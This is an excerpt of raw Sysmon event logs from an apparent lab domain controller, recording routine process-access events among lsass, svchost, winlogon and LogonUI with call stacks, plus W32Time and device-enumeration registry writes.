13:29:54.576{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.560{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:54.545{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000009635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:54.545{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0012d346) 13241300x80000000000000009634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:54.545{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea70-0xf618f38c) 13241300x80000000000000009633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:54.545{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea79-0x57dd5b8c) 13241300x80000000000000009632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:54.545{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea81-0xb9a1c38c) 10341000x80000000000000009631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.451{08A6967A-4288-6000-1500-000000009A01}13241444C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.295{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.295{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.295{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-14 13:29:54.295{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\1\FriendlyNameMicrosoft Passport Container Enumeration Bus 13241300x80000000000000009626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 13:29:54.279{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0003\DriverVersion10.0.14393.0 13241300x80000000000000009625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-14 13:29:54.279{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\0\FriendlyNameSmart Card Device Enumeration Bus 13241300x80000000000000009624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 13:29:54.279{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0002\DriverVersion10.0.14393.0 10341000x80000000000000009623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Win